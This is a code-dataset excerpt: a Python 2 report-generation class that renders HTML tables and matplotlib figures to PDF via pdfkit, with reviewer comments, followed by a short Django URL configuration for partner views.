        return fmt.format(*clean_args, **clean_kwargs)
    def to_pdf(self, options={}, verbose=True):
        """Generates a pdf
        Parameters
        ----------
        options : dict
            options are pdfkit.from_url options. See
            https://pypi.python.org/pypi/pdfkit
        verbose : bool
            iff True, gives output regarding pdf creation
        Returns
        -------
        Path of generated pdf
        """
        # NOTE(review): mutable default argument -- the 'quiet' key written
        # below persists across calls that rely on the default; consider
        # options=None with a fresh dict inside.
        if verbose:
            print 'Generating report...'
        # Write the accumulated snippets into one HTML document, then let
        # pdfkit/wkhtmltopdf render it.
        with open(self.__html_src_path, 'w') as html_out:
            html_out.write(self.__get_header())
            html_out.write('\n'.join(self.__objects))
            html_out.write(self.__get_footer())
        if not verbose:
            options['quiet'] = ''
        pdfkit.from_url(self.__html_src_path, self.__report_path,
                        options=options)
        report_path = self.get_report_path()
        if verbose:
            print 'Report written to {}'.format(report_path)
        return report_path
    def __np_to_html_table(self, sa, fout, show_shape=False):
        # Render a structured array as an HTML table (header from dtype
        # names, one <tr> per record) and write it to fout.
        if show_shape:
            fout.write('<p>table of shape: ({},{})</p>'.format(
                len(sa),
                len(sa.dtype)))
        fout.write('<p><table>\n')
        header = '<tr>{}</tr>\n'.format(
            ''.join(
                [self.__html_format(
                    '<th>{}</th>',
                    name) for
                 name in sa.dtype.names]))
        fout.write(header)
        data = '\n'.join(
            ['<tr>{}</tr>'.format(
                ''.join(
                    [self.__html_format(
                        '<td>{}</td>',
                        cell) for
                     cell in row])) for
             row in sa])
        fout.write(data)
        fout.write('\n')
        fout.write('</table></p>')
    def get_report_path(self):
        """Returns path of generated pdf"""
        return os.path.abspath(self.__report_path)
    def __get_header(self):
        # Thanks to http://stackoverflow.com/questions/13516534/how-to-avoid-page-break-inside-table-row-for-wkhtmltopdf
        # For not page breaking in the middle of tables
        return ('<!DOCTYPE html>\n'
                '<html>\n'
                '<head>\n'
                '<style>\n'
                'table td, th {\n'
                '    border: 1px solid black;\n'
                '}\n'
                'table {\n'
                '    border-collapse: collapse;\n'
                '}\n'
                'tr:nth-child(even) {\n'
                '    background: #CCC\n'
                '}\n'
                'tr:nth-child(odd) {\n'
                '    background: white\n'
                '}\n'
                'table, tr, td, th, tbody, thead, tfoot {\n'
                '    page-break-inside: avoid !important;\n'
                '}\n'
                '</style>\n'
                '</head>\n'
                '<body>\n')
    def add_subreport(self, subreport):
        """Incorporates another Report into this one
        Parameters
        ----------
        subreport : Report
            report to add
        """
        # Private-name access works because subreport is also a Report
        # (name mangling resolves to _Report__objects).
        self.__objects += subreport.__objects
    def __get_footer(self):
        return '\n</body>\n</html>\n'
    def add_heading(self, heading, level=2):
        """Adds a heading to the report
        Parameters
        ----------
        heading : str
            text of heading
        level : int
            heading level (1 corresponds to html h1, 2 corresponds to
            html h2, etc)
        """
        self.__objects.append(self.__html_format(
            '<h{}>{}</h{}>',
            level,
            heading,
            level))
    def add_text(self, text):
        """Adds block of text to report"""
        self.__objects.append(self.__html_format(
            '<p>{}</p>',
            text))
    def add_table(self, M):
        """Adds structured array to report"""
        M = utils.check_sa(M)
        sio = StringIO.StringIO()
        self.__np_to_html_table(M, sio)
        self.__objects.append(sio.getvalue())
    def add_fig(self, fig):
        """Adds matplotlib.figure.Figure to report"""
        # So we don't get pages with nothing but one figure on them
        fig.set_figheight(5.0)
        # Saved into the temp folder next to the HTML source so the
        # relative <img src> resolves when pdfkit renders the page.
        filename = 'fig_{}.png'.format(str(uuid.uuid4()))
        path = os.path.join(self.__tmp_folder, filename)
        fig.savefig(path)
        self.__objects.append('<img src="{}">'.format(filename))
    def add_summary_graph(self, measure):
        """Adds a graph to report that summarizes across an Experiment
        Parameters
        ----------
        measure : str
            Function of Experiment to call. The function must return a dict of
            Trial: score. Examples are 'average_score' and 'roc_auc'
        """
        if self.__exp is None:
            raise ReportError('No experiment provided for this report. '
                              'Cannot add summary graphs.')
        results = [(trial, score, self.__back_indices[trial]) for
                   trial, score in getattr(self.__exp, measure)().iteritems()]
        # Bars sorted best-to-worst; each bar is annotated with the
        # trial's original index so it can be matched to the legend.
        results_sorted = sorted(
            results,
            key=lambda result: result[1],
            reverse=True)
        y = [result[1] for result in results_sorted]
        x = xrange(len(results))
        fig = plt.figure()
        plt.bar(x, y)
        fig.set_size_inches(8, fig.get_size_inches()[1])
        # NOTE(review): maxy is never used below.
        maxy = max(y)
        for rank, result in enumerate(results_sorted):
            plt.text(rank, result[1], '{}'.format(result[2]))
        plt.ylabel(measure)
        self.add_fig(fig)
        plt.close()
    def add_summary_graph_roc_auc(self):
        """Adds a graph to report that summarizes roc_auc across Experiment"""
        self.add_summary_graph('roc_auc')
    def add_summary_graph_average_score(self):
        """Adds a graph to report that summarizes average_score across Experiment
        """
        self.add_summary_graph('average_score')
    def add_graph_for_best(self, func_name):
        """Adds a graph to report that gives performance of the best Trial
        Parameters
        ----------
        func_name : str
            Name of a function that can be run on a Trial that returns a
            figure. For example 'roc_curve' or 'prec_recall_curve'
        """
        if self.__exp is None:
            raise ReportError('No experiment provided for this report. '
                              'Cannot add graph for best trial.')
        # "Best" means highest average score across the experiment.
        best_trial = max(
            self.__exp.trials,
            key=lambda trial: trial.average_score())
        fig = getattr(best_trial, func_name)()
        self.add_fig(fig)
        # NOTE(review): the trailing ']' in this message looks like a typo,
        # but it is user-visible output, so it is left untouched here.
        self.add_text('Best trial is trial {} ({})]'.format(
            self.__back_indices[best_trial],
            best_trial))
        plt.close()
    def add_graph_for_best_roc(self):
        """Adds roc curve for best Trial in an experiment"""
        self.add_graph_for_best('roc_curve')
    def add_graph_for_best_prec_recall(self):
        """Adds prec/recall for best Trial in an experiment"""
        self.add_graph_for_best('prec_recall_curve')
    def add_legend(self):
        """
        Adds a legend that shows which trial number in a summary graph
        corresponds to which Trial
        """
        if self.__exp is None:
            raise ReportError('No experiment provided for this report. '
                              'Cannot add legend.')
        list_of_tuple = [(str(i), str(trial)) for i, trial in
                         enumerate(self.__exp.trials)]
        table = cast_list_of_list_to_sa(list_of_tuple, col_names=('Id', 'Trial'))
        # display 10 at a time to give pdfkit an easier time with page breaks
        # NOTE(review): the slice/step of 9 actually emits 9 rows per
        # chunk, not 10 as the comment above says.
        start_row = 0
        n_trials = len(list_of_tuple)
        while start_row < n_trials:
            self.add_table(table[start_row:start_row+9])
            start_row += 9
| StarcoderdataPython |
6559614 | <gh_stars>1-10
from django.urls import path
from . import views
# URL routes for the partner app; the route names are what reverse() and
# {% url %} lookups elsewhere refer to.
urlpatterns = [
    path("detail", views.PartnerDetailView.as_view(), name="partner-detail"),
    path("agreement", views.PartnerAgreementView.as_view(), name="partner-agreement"),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.